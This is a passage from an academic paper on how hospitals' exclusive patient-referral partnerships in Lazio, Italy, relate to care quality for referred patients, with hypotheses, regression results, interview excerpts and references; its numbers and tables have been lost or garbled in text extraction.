partners generates, and is generated by, mutual trust (granovetter, ; gulati, ; zaheer and venkatraman, ). partners who develop trust are more willing to mutually disclose information without fearing harmful consequences (levin and cross, ; lui and ngo, ; mayer et al., ). openness about an organization’s shortcomings in client service is particularly helpful in despite the affinity between relational exclusivity and granovetter’s ( ) notion of embeddedness, we avoid treating the two concepts as equivalent because alterna- tive operationalizations of embeddedness have been sug- gested (e.g. moody and white, ). clients’ outcomes from providers’ networks informing its partners how they can assist its clients. for example, firms more fully disclose their products’ typical problems to external customer support partners who they have trusted relational ties to; awareness of the problems in turn helps such partners provide good customer support (wuyts et al., ). similarly, clinical history paperwork that accompanies patients referred between hospitals may reveal shortcomings in the referring hospital’s treatment (with potential reputational and legal repercussions) − but the shortcomings also suggest what the receiving hospital can do for the patient that the sending hospital could not (iwashyna and courey, ; lomi and pallotti, ). thus, by enabling trust-based disclosure, relational exclusivity better positions providers to combine their capabilities in ways that benefit clients. second, exclusive relations help partners over- come obstacles to knowledge absorption. a substan- tial share of knowledge that collaborators need to complete joint tasks is tacit, complex or both. the absorption of tacit or complex knowledge depends on assistance that its source offers. because partners in embedded, exclusive relations have more willingness and shared time to assist each other in absorbing knowledge, and to ask for assistance, such relations have proved instrumental for tacit and complex organizational learning (szulanski, ; uzzi, ). the notion that exclusive relations help convey and retain tacit knowledge has been invoked to explain the very existence of organizations (kogut and zander, ). insofar as the use of exclusive relations to link to the network facilitates the absorption of knowledge that may benefit organizations, we expect it to have the same effect on knowledge that helps them jointly benefit their clients. the relationship between providers’ relational exclusivity and the benefits of their service recipients may be summarized as follows: h . a provider generates more benefit to service recipients through its partnership ties to the extent that the provider concentrates relations to few partners rather than spreads them out among many partners. complementary client service capabilities our argument is premised on the logic of comple- mentary capabilities. we argued that relational exclusivity unlocks the potential of partnering orga- nizations to benefit clients because it improves their knowledge and use of network partners’ complementary client service capabilities. this logic implies that the hypothesized effect of relational exclusivity varies with the extent to which the focal providers’ and its partners’ capabilities can be combined to benefit clients. if providers have few complementary capabilities, their networks can produce little benefit to their clients, no matter how they might be structured. conversely, if the partners’ complementarity is high, beneficially structured networks will help them direct their clients toward partners’ capabilities that they lack. to probe the supporting logic of our first hypothesis, we examined the following additional hypothesis: h . the positive effect of relational exclusivity on client benefit is stronger to the extent that the providers’ and its partners’ client service capabilities are complementary. the empirical setting we test our hypotheses using data that we collected on patient referral relations in a network of hospital figure : high and low relational exclusivity. note: relational exclusivity is an attribute of the black node. line thickness is proportional to relation intensity. high relational exclusivity low relational exclusivity connections organizations. our choice of health care as the empirical setting is consistent with our focus on capability-related causal mechanisms. because of the ethical and legal norms that mandate concern for patient well-being, motivational determinants of the quality of client service in health care may vary little and be poorly generalizable to other contexts. in contrast, health care providers’ use of partners’ complementary capabilities to benefit a patient is not mandated; it is subject to the effects of providers’ network features, as it is in other types of services. the health care system in lazio lazio is the large italian region with the center in rome and a population of almost . million. the health care system in lazio is part of italy’s national health service (inhs), a publicly funded health care system providing universal insurance coverage to all citizens and legal residents. during the four-year period covered by our data, the system had facilities in lazio, of which were publicly owned hospitals. the remaining were accredited private hospitals and contracting ambulatory care organizations. all facilities, regardless of the ownership form, accepted universal health insurance. the system underwent reforms in the s, aimed at improving overall performance. among other changes, the reforms introduced a diagnosis- based system of reimbursement of hospital services, established financial performance criteria and made hospital ceos responsible for meeting them, gave patients more freedom to choose health care providers, and made funding more directly dependent on the amount and quality of provided services. the reforms created a quasi-market designed to sustain the equity benefits of traditional public healthcare systems while also reaping the potential efficiency gains from competition (barretta, ). in this hybrid arrangement, accredited hospitals compete for patients and inhs budget allocations but may also cooperate in the interest of public health (lomi and pallotti, ). inter-hospital patient referral inter-hospital referral of patients is a common collaborative activity for health care institutions (iwashyna and courey, ; lomi and pallotti, ). we focus on the referral of inpatients under nonemergency conditions. engaging in such referral is voluntary for hospitals − they have the discretion to make, accept and refuse referral requests. there are no regulations prescribing the choice of collaboration partners or requiring that hospitals give reasons for acceptance or refusal. nor may a hospital be forced to refer a patient simply because it lacks beds or admits no patients with particular symptoms or condition − by definition, inpatient referral may only happen if the patient was previously admitted to the sending hospital. as hospitals face few external pressures in nonemergency referral decisions, the referral destinations are determined, alongside care quality, by informal, hospital-specific norms and routines (bosk et al., ; veinot et al., ). patient referral networks are uniquely suited to our empirical purposes for at least four reasons. first and foremost, patient referral data can detect the particular benefits that accrue to care recipients from relations between providers, rather than risk confounding these benefits with those that come from other sources. when a patient is referred to a hospital delivering services of higher quality, we know that the improvement in service quality that she experiences is due to a particular instance of interorganizational collaboration. in contrast, in most other instances where clients may benefit or suffer from interorganizational relations, no quantitative method can reliably link a client’s outcome to any particular relation. this link can only be established in in-depth case study (provan and milward, ) or indirectly inferred from correlation between network variables and client outcomes (hochberg et al., ). second, our statistical inference is immune to selection biases resulting from service recipients’ actions because patients surrender control at admission over interhospital referrals. patients cannot choose where they will be referred; like any other treatment decision, referral remains a prerogative of the hospital in charge of the patient. third, the exclusivity of patient referral relations exhibits wide and meaningful variation, necessary for the test of h . some hospitals’ patient referrals are episodic acts, negotiated and coordinated ad hoc for each specific instance. in other cases, patient referral is a manifestation of an underlying rich and lasting, exclusive interorganizational partnership. such partnerships involve well-developed knowledge exchange routines, trust and joint decision making (bosk et al., ; gittell and weiss, ). they predate and transcend specific instances of referral. finally, the particular methodological advantage of the inpatient referral network in lazio is that it is largely contained within the region. in the period that we studied, only between and percent of lazio’s inpatient referrals crossed the region’s boundary (marrocu et al., , p. ). network boundary specification, an endemic problem in network studies, is thus not a major concern in our data. clients’ outcomes from providers’ networks data our quantitative data come from the regional hospital information system database maintained by the public health agency of lazio. the database holds information on attributes of the hospitals in the region accredited by the inhs and on referral patient flows between them, recorded annually from through . we used data on all of these hospitals except two that referred no patients. the data set records a referral only if the receiving hospital admitted the referred patient. to improve our contextual understanding of patient referral in lazio, we conducted semi-structured interviews with region’s physicians and hospital administrators. measures data structure and model our data set has a four-wave panel structure: the variables are measured yearly at the level of the hospital. standard errors may be biased when regression models are estimated with panel data sets because the residuals are subject to correlation across repeated observations within organizations and within periods. to preclude such bias, the standard errors in the linear regression models reported below were corrected for hospital-level and year-level clustering (cameron et al., ; thompson, ). the correction algorithm calculates standard errors in three cluster- robust covariance matrices: one with clustering by the first variable (hospital), one with clustering by the second variable (year), and one with clustering by their intersection. the standard errors are then estimated with the matrix computed by summing the first two matrices and subtracting the third (cameron et al., ). unlike in fixed and random effects models, standard errors corrected for clustering by two variables are unbiased even when the effect of one clustering variable varies across levels of the other (petersen, ) . dependent variable: patient benefit patients benefit from interhospital referral networks to the extent that the receiving hospitals provide higher quality care than the sending hospitals (bosk et al., ; iwashyna et al., ; lomi et al., ). the risk-standardized readmission rate (rsrr) is a common measure of the quality of hospital care (axon and williams, ; horwitz et al., ; landrum and weinrich, ). when patients are frequently readmitted to a hospital, this attests that the hospital fails to cure the conditions that its patients need treatment for; conversely, if the readmission rate is low, the hospital routinely succeeds in curing its patients. the inhs officially defines hospital readmission as admission of the patient into the hospital from which that patient was discharged within previous days for the same condition. to make this raw readmission rate comparable across hospitals, it is standardized by the types of medical procedures offered by the hospital and the complexity of cases treated. cases of planned readmission (such as chemotherapy, hiv and kidney dialysis) are excluded from the calculation of the rsrr. rsrr is routinely used by the inhs, medicare, medicaid and the hospital quality alliance to measure patient outcomes in a way that is comparable across hospitals with different specialization profiles (centers for medicare and medicaid services, ). unlike the mortality rate, the other common measure of care quality, rsrr is applicable to non-life-threatening conditions. rsrr has passed construct validity tests that compared it to hospital rankings and patient satisfaction (boulding et al., ; halfon et al., ; horwitz et al., ). it also responds to interventions aiming to improve care quality (coleman et al., ). despite its advantages and wide use, rsrr is not a perfect metric. it is a coarser measure of care quality than other possible readmission measures unavailable to us, such as department-level readmission rates. also, the precise definition of unplanned readmission and the methods of cross-hospital standardization are a matter of debate in medical research (axon and williams, ). we embrace rsrr in awareness of these imperfections. following lomi et al. ( ), we conceptualize patient benefit from a single instance of referral as the difference between the quality of care in the hospital that receives and in the hospital that sends the patient. because lower readmission rates correspond to better quality, we subtract the rsrr in the sending hospital from that in the receiving hospital. our dependent variable brings this patient benefit measure to the level of the hospital by summing these differences over all the hospital’s referrals made or received in the year. the higher the sum is, the greater is the total patient benefit from the hospital’s patient referral relations. this correction may be used with any pair of variables that make observations non-independent and with a variety of regression models. the stata code that implements correc- tion for clustering on two variables in linear, probit, logit and tobit models is available at www.kellogg.northwestern.edu/ faculty/petersen/htm/papers/se/se_programming.htm. connections because hospital and interhospital factors in a given year (rather than any prior year) are most relevant to the patient referral outcomes in that year, our dependent variable is not lagged. independent variables relational exclusivity first-order network coupling captures the extent to which organizations concentrate their relations to few partners rather than spread them out among many potential partners (uzzi, ). researchers have used first-order network coupling in various contexts, adapting it to the type of network at hand (see e.g. shipilov, ; shipilov et al., ). in a network of patient referrals, the measure captures the extent to which hospitals concentrate their referrals to few of the many potential partner hospitals. it is computed as ∑j j= p ij , where p ij is the fraction of hospital i’s total patient referral flow accounted by referrals to or from partner hospital j, and j is the count of partner hospitals in i’s referral network. when the measure is close to , the hospital spreads out its patient referral relations among many partner hospitals, without clearly preferring some over others. when the measure is at its extreme value of , the focal hospital has an exclusive referral relation with one partner. complementarity of capabilities one hospital may complement another’s patient care capabilities by having clinical expertise or equipment that the other lacks. for example, when a hospital lacking an oncology unit refers a patient with cancer symptoms to one that specializes in oncology, the hospitals are leveraging their complementarity for patient benefit. in our context, such complementarity is measurably reflected in hospitals’ clinical speci alty profiles. the profile of the focal hospital is complementary with its referral partners to the extent that its partners lack its clinical specialties and it lacks theirs. this type of complementarity is captured by the jaccard distance (one minus the ratio of overlapping specialties to all unique specialties that either partner has) between a hospital and its partner. thus, we compute the measure of clinical complementarity as the average jaccard distance between the focal hospital and all its partners. there are clinical specialties represented in the sample. control variables we included a set of control variables to minimize the threat of omitted variable bias. to account for larger hospitals’ greater capacity to benefit patients, we included the hospital size, expressed as the number of beds. the average number of beds among the focal hospital’s referral partner hospitals captures the same capacity in the hospital’s partnership network. we controlled for the hospital’s occupancy rate, to account for the possibly higher propensity to refer patients when the hospital has a shortage of available beds. because we expect geographic proximity to affect both the patient benefits and the networks that the hospitals create, we controlled for the average geographic distance between the focal hospital and its referral partners, weighted by the total yearly patient flow between them. furthermore, we controlled for the ownership form, distinguishing private from public hospitals, to account for private organizations’ higher propensity to focus on economic performance at the expense of client benefit (hansmann, ; baum et al., ). the hospital attributes in our model that are potentially related to patient benefit from referrals include the total number of referral patients that the hospital sent and received in the given year, the case mix index (inhs’s standard measure of the complexity of the cases treated by the hospital), and the com- parative performance index (cpi). the cpi is the annual hospital efficiency score, computed annually by the regional division of the inhs. the cpi captures the relative time that it takes the hospital to successfully treat cases of similar complexity. the index takes the value of for hospitals whose performance is average compared with other hospitals in the region. it is below (above) if the hospital performs above (below) the regional average. we also controlled for the rsrr in the focal hospital. this control is essential because hospitals with a higher readmission rate (i.e. those that provide less effective treatment) are by design more likely to benefit patients when they refer them to another hospital and less likely to do so when they receive referred patients. table shows the measures’ descriptive statis- tics and correlation matrix. all control variables except the number of referrals made and received are significantly correlated with the dependent variable and at least one main independent variable; exclusion of these variables would therefore subject the model to omitted variable bias. results are patients referred to hospitals providing better care? before examining the determinants of patient refe- rral to hospitals providing better care, it is instructive clients’ outcomes from providers’ networks t a b le . v a ri a b le s in t h e a n a ly si s: d e sc ri p ti ve s ta ti st ic s a n d t h e c o rr e la ti o n m a tr ix . v a ri a b le m s d . p at ie n t b en ef it − . . . b ed s in f o ca l h o sp ita l . . − . ** . a ve ra g e b ed s in p ar tn er h o sp ita ls . . − . ** − . . o cc u p an cy r at e . . − . ** . ** − . . a ve ra g e d is ta n ce t o p ar tn er s (k m ) . . − . ** . * . . ** . p riv at e h o sp ita l . . . ** − . ** . − . ** − . ** . r ef er ra l p at ie n ts s en t in ye ar . . − . . ** − . ** . ** . − . ** . r ef er ra l p at ie n ts re ce iv ed in y ea r . . − . . ** − . . ** − . − . . ** . c as e m ix in d ex . . − . ** . ** . . − . . * − . . ** . c o m p ar at iv e p er fo rm an ce in d ex . . − . * . ** . . ** . − . ** . . ** − . . . r is k- st an d ar d iz ed re ad m is si o n r at e . . − . ** . ** . . − . − . ** − . . . ** . ** . c lin ic al c o m p le - m en ta rit y w ith p ar tn er s . . − . ** . ** − . ** . ** − . − . ** . ** . ** . ** . . ** . r el at io n al e xc lu si vi ty . . . ** − . ** . − . ** − . ** . ** − . − . . ** − . ** − . * − . ** n o te s: n = h o sp ita l- ye ar s w ith n o n -m is si n g d at a. c as es a re m is si n g w h en h o sp ita ls n ei th er s en d n o r re ce iv e re fe rr ed p at ie n ts . *p < . ;* *p < . . connections to see how commonly patients get routed toward higher- or lower-quality hospitals. the numbers in table confirm that patient referral is not optimized to care quality in our setting, a pattern already noted in various patient referral networks (bosk et al., ; hains et al., ; veinot et al., ). in every year within our observation period, a patient was slightly more likely to be referred to a hospital with a higher (worse) rsrr compared to the sending hospital than to a hospital with a lower readmission rate. the same tendency is evidenced by the negative mean of the patient benefit variable. care quality improvement is thus clearly not a guaranteed outcome of patient referral in our setting, but rather a contingent feature dependent on partner hospitals involved. the effect of relational exclusivity table reports the results of the multivariate analysis of patient referral to hospitals with better care quality (lower readmission rate). model includes only the control variables. it has good predictive power, largely because the amount of benefit or harm a hospital (or any organization) can create is a function of its size, captured by the bed count and patient flow variables. in model , we add the measure of relational exclusivity. the model tests the notion that hospitals whose patient referral relations tend to be concentrated to few partners − rather than spread among many partners − create more benefit to their referral patients. the fit of the model significantly improved relative to model , and r increased to . . the effect of the added variable is large and positive, supporting h . the effect of interaction of relational exclusivity and clinical complementarity model includes the interaction term of clinical complementarity with relational exclusivity. the interaction effect is large, positive, and significant. consistent with h , this result shows that clinical complementarity amplifies the effect of relational exclusivity. remarkably, it is only due to hospitals’ leveraging of clinical complementarity that this effect attains significance in model . the non-significant main effect of relational exclusivity in model affirms that, at low levels of complementarity, the prediction of h does not hold. in other words, when partner hospitals have few complementary capabilities to be aware of and to act upon, relational exclusivity produces no significant patient benefit. on the other hand, the negative and significant main effect of clinical complementarity attests that, at low levels of relational exclusivity, hospitals that are highly complementary with their partners tend to refer patients into inferior care conditions. it is only at higher levels of relational exclusivity that clinical complementarity helps hospitals refer patients toward better care. figure visualizes the moderating effect of clinical complementarity in model . the vertical axis shows the effect of relational exclusivity on patient benefit at every level of clinical complementarity. the lowest value of this effect is . , which corresponds to the main effect of relational exclusivity. the effect increases as clinical complementarity increases, reaching significance at p = . beyond the th percentile of clinical complementarity. table . the flow of referral patients by year and relative risk-standardized readmission rate. patients referred to hospitals where readmission rate is year lower (better) than in sending hospital higher (worse) than in sending hospital same as in sending hospital , , , , , , , , total , , clients’ outcomes from providers’ networks table . effect of relational exclusivity on patient referral to hospitals with better care quality. linear regression models with two-dimensional clustering of standard errors model model model beds in focal hospital − . ** ( . ) − . ** ( . ) − . ** ( . ) average beds in referral partner hospitals − . * ( . ) − . ( . ) − . * ( . ) occupancy rate − . ** ( . ) − . * ( . ) − . * ( . ) average weighted distance to partners (km) − . ( . ) − . ( . ) − . ( . ) private hospital . ( . ) . ( . ) − . ( . ) case mix index − . ** ( . ) − . ** ( . ) − . ** ( . ) comparative performance index . ( . ) . ** ( . ) . * ( . ) referral patients sent in year < . (< . ) < . (< . ) < . (< . ) referral patients received in year . ** (< . ) . ** (< . ) . ** (< . ) risk-standardized readmission rate − . ** ( . ) − . * ( . ) − . * ( . ) clinical complementarity with partners ≤ . ( . ) − . ** ( . ) relational exclusivity . ** ( . ) . ( . ) clinical complementarity with partners × relational exclusivity . ** ( . ) n r . . . lr χ (relative to previous model) − . ** . ** notes: standard errors, clustered by hospital and year, are in parentheses. the unit of analysis is hospital-year. the intercept is omitted.*p < . ; **p < . . supplementary analyses we performed supplementary analyses to examine two types of potential threat to the validity of our results. first, we checked the robustness of our quantitative findings. second, we examined the transcripts of our interviews with health care professionals to confirm that they understand the main concepts that we measured and consider them when making patient referral decisions. robustness checks because the positive effect of relational exclusivity on organizational outcomes has been shown to peak at an optimal level and then decline (uzzi, ), we examined if our linear specification of this effect was warranted. we tried adding the quadratic term to model . the quadratic term had no significant effect, and we omitted it. we also experimented with adding the quadratic term and its interaction term with clinical complementarity to model . the added terms created multicollinearity and did not improve the fit of model . the interaction of the quadratic term with clinical complementarity was not significant. we also re-estimated models and with the added variable measuring hospitals’ degree of specialization, a herfindahl index summing the squared shares of beds allocated to each clinical specialty. because more specialized hospitals tend to have more exclusive referral relations, models might have confounded the effects of specialization and exclusivity. with the herfindahl index included in models and , both hypothesized effects retained their size and significance. the index had no significant effect, did not improve the model fit connections and removed nine observations because of missing specialization data. the results reported in table are remarkably robust to model specification. we reproduced both hypothesized effects in models with fixed hospital and year effects, with correction for clustering on one variable (year or hospital) only, with the huber−white correction, and with uncorrected random effects. we also reproduced all effects when the sample was restricted to hospital partnerships where patient benefit values were positive. all results of robustness checks are available on request. relational exclusivity and complementary capabilities in health professionals’ accounts we used the transcripts of our interviews with health care professionals to verify that physicians and hospital administrators understand and use − at everyday, common-sense level − the concepts that we theorized and measured. our semi-structured interviews preceded the rest of our work on this study and were not intended to bear on its arguments. the objective of the interviews was to elicit first-hand accounts of why and how hospitals refer patients. because we used a convenience sample, the data enable no robust causal inference. nevertheless, the interview evidence added confidence that decision makers in hospitals understand relational exclusivity and complementary capabilities and consider them in making patient referrals. every respondent in our sample was asked “why does your hospital refer patients to other hospitals?” additional unscripted follow-up questions were asked to elicit extended answers to this question. some follow-up questions were asked by email and answers were appended to the transcripts. our respondents, physicians and administrators alike, showed awareness of the role of relational exclusivity. in accordance with our hypotheses, they attested that exclusive relations help hospitals leverage knowledge of mutual complementary capabilities for patient benefit. a physician said: there are a few hospitals that [together] send us […] to percent of the [referral] patients [we receive]. […] apart from geography, [we prefer these hospitals because] they know what we can do for their patients. and, of course, we send our patients to these hospitals whenever needed . he proceeded to explain that exchange of patients with such frequent partner hospitals is easier because all interview quotes are translated from italian. figure : the marginal effect of relational exclusivity across the range of the clinical complementarity variable. note: the % confidence interval shown in grey. the line is thicker where the marginal effect is different from zero at p < . . clients’ outcomes from providers’ networks information about what the partner can do for the patient can be more effectively communicated: in some instances […[ a phone call of minutes is enough [to finalize a patient referral]. […] [such quick decision making] has to do with […] knowledge about resources […] and administrative procedures. previous interaction helps us accumulate such precious knowledge. the administrative director of a large children’s hospital similarly pointed out that procedural know- ledge among frequent referral partners helps the efficiency of the referral: hospitals that send patients more regularly, or with which we have been in touch for a long time, are very good in sending us the right material that lets us fully understand [how we can help with] the clinical case. […] there are partners who know very well what we want to see in their referral requests. and this is not strictly related to the type of patient to be transferred, but rather it is about how they present their request and about the completeness of information. a physician in a major teaching hospital suggested that exclusive relations may not only create aware- ness of complementary care capabilities, but also the confidence that the partner will make these capabilities available when requested: i remember a patient with lung cancer who […] developed an infection. we have no clinical ward for infection diseases at our hospital, so we decided to transfer the patient. […] we chose [hospital x] as partner because they have a good infectious disease department. […] i know they have the expertise and have never refused to receive a patient [from us]. finally, we noted that awareness of complemen- tary capabilities may motivate hospitals not only to send but also to receive referral patients. a physician reported that his hospital “primarily accepts patients coming from another hospital because we have better ability to treat their diseases.” discussion contributions and future directions under what conditions do clients benefit from providers’ partnership networks? our answer builds on the idea that client benefits ensue from providers’ ego-network features that enable the use of mutually complementary capabilities to deliver higher-quality client service. we argued that relational exclusivity improves the providers’ knowledge and use of network partners’ complementary capabilities and thereby helps clients benefit from providers’ network relations. we hypothesized that organizations will be more likely to know their partners’ capabilities and put this knowledge to work for the benefit of the client to the extent that their relations are concentrated among few selected partners. the analysis supported this hypothesis. we also found that the hypothesized effect strengthens as the complementarity of providers’ client service capabilities increases, which supports the notion that relational exclusivity facilitates the use of such capabilities for client benefit. our argument and findings offer two contributions to organizational network theory. first, we offer early evidence that configurations of providers’ networks may not only benefit organizations, as previous network studies amply confirmed, but also deliver benefits to organizations’ clients. second, our study transcends the notion that providers’ networks benefit clients when providers are motivated to serve client needs. we point out that motivation cannot fully account for clients’ benefits from providers’ networks and advocate a theoretical account that embraces the role of providers’ network features that unlock their client service capabilities. these contributions hold out a promise of a fruitful research program examining network features that make providers more or less capable of serving client needs. we start and encourage this research effort. as the emerging literature on clients’ benefits from organizational networks matures, it may fruitfully mirror the earlier theoretical and empirical development of the literature on organizations’ benefits from networks. two pathways in this development have been particularly rich in insight. first, research moved from examining the main effects of having ties (mizruchi and stearns, ; uzzi, ; gulati, ) toward contingent theories examining the benefits and drawbacks of networks depending on external environments and tasks at hand (gulati and higgins, ; fleming et al., ). second, studies progressed from focusing on the effects of network structures (coleman et al., ; granovetter, ) toward examining the content of network relations (e.g. emirbayer and goodwin, ). both pathways remain largely untrodden in research on clients’ benefits. future studies may examine how client benefits from networks are contingent on the intensity of competition among providers and on whether providers are for-profit or nonprofit. they may further consider how the structural effects are modified by cross-cultural variation in network relations’ content and by power inequalities between partners. we see our methodological contribution in encou- raging network research to capture the effects of connections interorganizational relations directly, rather than infer such effects from relationships between network variables and outcome variables. our method highlights the distinction between, on the one hand, capturing whether providers refer clients to network partners who offer better-quality service and, on the other hand, examining the correlation between a provider’s ego-network properties and its clients’ outcomes. in the former case, we can say with confidence that we are observing a relational effect: the client was served by a better- quality provider because of the cooperation between specific providers in the network. in the latter case, we cannot rule out that the correlation exists due to unmeasured provider properties that simultaneously affect its networks and client outcomes, such as financial or other resources. similar distinctions apply in all studies of relational outcomes, where only an unmistaken linkage between a relation and its outcomes can safeguard against spurious network effects. practical implications our argument suggests that service recipients’ outcomes may be improved by structuring providers’ network ties in ways that promote the coordinated use of providers’ service capabilities. this opens new ways of improving health care outcomes, particularly by countering the adverse effects of care fragmentation. research has shown that patients are disadvantaged when patient care is spread across poorly coordinated providers and examined the merits of anti-fragmentation policies aimed at internalizing the care within formally organized groups of providers (agha et al., ). our study suggests that promotion of preferred provider-to-provider direct partnerships, rather than organized provider groups, may be a viable alternative anti-fragmentation policy. generalizability and limitations we advocate caution in generalizing our argument or empirical results. this is not because there are evident reasons why relational exclusivity should fail to produce the hypothesized effects beyond health care, or beyond professional services, but because these reasons are largely unexplored. while a close examination of these reasons is beyond our scope, three conditions seem particularly likely to restrict the generalizability of our argument. first, we expect relational exclusivity to generate client benefits only in settings where providers’ capabilities are differentiated. if providers have identical capabilities, their potential to improve products or services by partnering is limited. indeed, as our analysis just showed, network mechanisms generate no patient benefits in hospitals whose network partners have similar service capabilities. second, our argument depends on the presence of motivation to deliver good client service. whichever client benefit potential provider networks may create, providers who lack all motivation to deliver good outcomes to clients − most typically in markets with limited competition − will not realize that potential. third, the argument only applies when providers partner in matters of serving client needs. we do not theorize any client outcomes from partnerships established for other purposes, such as joint lobbying or acting against common competitors. a variety of professional services meets the triple scope condition of differentiation, client service motivation, and partnering in matters of service. beside health care, the three conditions are most reliably met in postsecondary education, accounting services, legal aid and venture capital − which all happen to be fields where, similar to health care, referrals of clients (or, in case of education, students) across organizations are common. in contrast, wholesaling commodity producers are not differentiated in capabilities relevant to end-consumer experience and thus fail to meet the first condition. normally, however, we do not expect the presence or absence of any of the three conditions to be a binary contrast, but rather a matter of degree. in most contexts, a dedicated empirical investigation is required to determine whether the scope conditions are sufficiently met for our argument to apply. our study has a number of methodological limitations. first, our empirical scope is limited to a local health care system. while health care has obvious institutional idiosyncrasies, the problem of how collaboration among organizations may benefit their customers remains general. our design would benefit from replication in different contexts, with measures of customer outcomes tailored to the context at hand. second, our measures of care quality are coarser than we would have liked. with fine-grained, preferably patient-level health data, we would be able to go beyond hospital-centered measures such as rsrr and examine transaction- level factors that affect patient outcomes. while access to patient-level information is difficult due to privacy concerns, such information may validate and improve the results of our study. third, referrals are one of many types of interorganizational collaboration that may be potentially consequential for client benefit. we trust that future research will build on clients’ outcomes from providers’ networks our arguments and analysis and will examine the implications of other types of interorganizational collaboration for client benefit. references agha, l., frandsen, b. and rebitzer, j. b. . causes and consequences of fragmented care delivery: theory, evidence, and public policy. working paper no. , national bureau of economic research, cambridge, ma. axon, r. n. and williams, m. v. . hospital readmission as an accountability measure. jama: the journal of the american medical association : – . baker, w. e. and faulkner, r. r. . the social organization of conspiracy: illegal networks in the heavy electrical equipment industry. american sociological review : – . barrera, d. and van de bunt, g. g. . learning to trust: networks effects through time. european sociological review : – . barretta, a. . the functioning of co-opetition in the health-care sector: an explorative analysis. scandinavian journal of management : – . baum, j. a., calabrese, t. and silverman, b. s. . don’t go it alone: alliance network composition and startups’ performance in canadian biotechnology. strategic management journal : – . baum, j. a. c., cowan, r. and jonard, n. . does evidence of network effects on firm performance in pooled cross-section support prescriptions for network strategy?. strategic management journal : – . boies, j. l. . money, business, and the state: material interests, fortune corporations, and the size of political action committees. american sociological review : – . borgatti, s. p. and halgin, d. s. . on network theory. organization science : – . bosk, e. a., veinot, t. and iwashyna, t. j. . which patients, and where: a qualitative study of patient transfers from community hospitals. medical care : – . boulding, w., glickman, s. w., manary, m. p., schulman, k. a. and staelin, r. . relationship between patient satisfaction with inpatient care and hospital readmission within days. american journal of managed care : – . brueckner, j. k. and whalen, w. t. . the price effects of international airline alliances. journal of law and economics : – . bunderson, j. s. and thompson, j. a. . the call of the wild: zookeepers, callings, and the double- edged sword of deeply meaningful work. administrative science quarterly : – . cameron, a. c., gelbach, j. b. and miller, d. l. . robust inference with multiway clustering. journal of business and economic statistics : – . centers for medicare and medicaid services . re- admission measures. available at: https://www.qualitynet. org/inpatient/measures/readmission (accessed july , ). cohen, m. d. and hilligoss, p. b. . the published literature on handoffs in hospitals: deficiencies identified in an extensive review. bmj quality & safety : – . coleman, e. a., parry, c., chalmers, s. and min, s. j. . the care transitions intervention: results of a randomized controlled trial. archives of internal medicine : – . coleman, j., katz, e. and menzel, h. . the diffusion of an innovation among physicians. sociometry : – . dibenigno, j. and kellogg, k. c. . beyond occu- pational differences: the importance of cross-cutting de- mographics and dyadic toolkits for collaboration in a u.s. hospital. administrative science quarterly : – . drange, i. . early-career income trajectories among physicians and dentists: the significance of ethnicity. european sociological review : – . durand, r. and mcguire, j. . legitimating agencies in the face of selection: the case of aacsb. organization studies : – . emirbayer, m. and goodwin, j. . network analysis, culture, and the problem of agency. american journal of sociology : – . fleming, l., mingo, s. and chen, d. . collaborative brokerage, generative creativity, and creative success. administrative science quarterly : – . gittell, j. h. and weiss, l. . coordination networks within and across organizations: a multi-level framework. journal of management studies : – . granovetter, m. . economic action and social structure: the problem of embeddedness. american journal of sociology : – . gravelle, h. and waterson, m. . no win, no fee: some economics of contingent legal fees. the economic journal : – . grier, k. b., munger, m. c. and roberts, b. e. . the industrial organization of corporate political participation. southern economic journal : – . gulati, r. . does familiarity breed trust? the implications of repeated ties for contractual choice in alliances. academy of management journal : – . gulati, r. . alliances and networks. strategic management journal : – . gulati, r. and higgins, m. c. . which ties matter when? the contingent effects of interorganizational partnerships on ipo success. strategic management journal : – . hains, i. m., marks, a., georgiou, a. and westbrook, j. i. . non-emergency patient transport: what are connections the quality and safety issues? a systematic review. international journal for quality in health care : – . halfon, p., eggli, y., prêtre-rohrbach, i., meylan, d., marazzi, a. and burnand, b. . validation of the potentially avoidable hospital readmission rate as a routine indicator of the quality of hospital care. medical care : – . hansmann, h. . the role of nonprofit enterprise. yale law review : – . hochberg, y. v., ljungqvist, a. and lu, y. . whom you know matters: venture capital networks and investment performance. journal of finance : – . horwitz, l., partovian, c., lin, z., herrin, j., grady, j., conover, m., montague, j., dillaway, c., bartczak, k., suter, l., ross, j., bernheim, s., krumholz, h. and drye, e. . hospital-wide all-cause unplanned readmission measure. technical report prepared for the centers for medicare & medicaid services. ingram, p. and roberts, p. w. . friendships among competitors in the sydney hotel industry. american journal of sociology : – . iwashyna, t. j. and courey, a. j. . guided transfer of critically ill patients: where patients are transferred can be an informed choice. current opinion in critical care : – . iwashyna, t. j., christie, j. d., moody, j., kahn, j. m. and asch, d. a. . the structure of critical care transfer networks. medical care : – . kogut, b. and zander, u. . knowledge of the firm, combinative capabilities, and the replication of technology. organization science : – . landrum, l. and weinrich, s. . readmission data for outcomes measurement: identifying and strengthening the empirical base. quality management in healthcare : – . leana, c., appelbaum, e. and shevchuk, i. . work process and quality of care in early childhood education: the role of job crafting. academy of management journal : – . levin, d. z. and cross, r. . the strength of weak ties you can trust: the mediating role of trust in effective knowledge transfer. management science : – . lomi, a., mascia, d., vu, d. q., pallotti, f., conaldi, g. and iwashyna, t. j. . quality of care and interhospital collaboration: a study of patient transfers in italy. medical care : – . lomi, a. and pallotti, f. . relational collabo- ration among spatial multipoint competitors. social networks : – . lui, s. s. and ngo, h. y. . the role of trust and contractual safeguards on cooperation in non-equity alliances. journal of management : – . marrocu, e., balia, s. and brau, r. . a spatial analysis of inter-regional patient mobility in italy. ersa conference paper no. ersa p , european regional science association louvain-la-neuve, belgium. mayer, r. c., davis, j. h. and schoorman, f. d. . an integrative model of organizational trust. academy of management review : – . mizruchi, m. s and stearns, l. b. . a longitudinal study of borrowing by large american corporations. administrative science quarterly : – . moody, j. and white, d. r. . structural cohesion and embeddedness: a hierarchical concept of social groups. american sociological review : – . morrish, s. c. and hamilton, r. t. . airline alliances − who benefits?. journal of air transport management : – . ozmel, u., yavuz, d., trombley, t. and gulati, r. . interfirm ties between ventures and limited part- ners of venture capital funds: performance effects in financial markets. organization science (forthcoming). pahnke, e. c., mcdonald, r., wang, d. and hallen, b. . exposed: venture capital, competitor ties, and entrepreneurial innovation. academy of management journal : – . patterson, e. s. . structuring flexibility: the potential good, bad and ugly in standardisation of hand- overs. quality and safety in health care : – . petersen, m. a. . estimating standard errors in finance panel data sets: comparing approaches. review of financial studies : – . powell, w. w., koput, k. w., smith-doerr, l. and owen-smith, j. . network position and firm performance: organizational returns to collaboration in the biotechnology 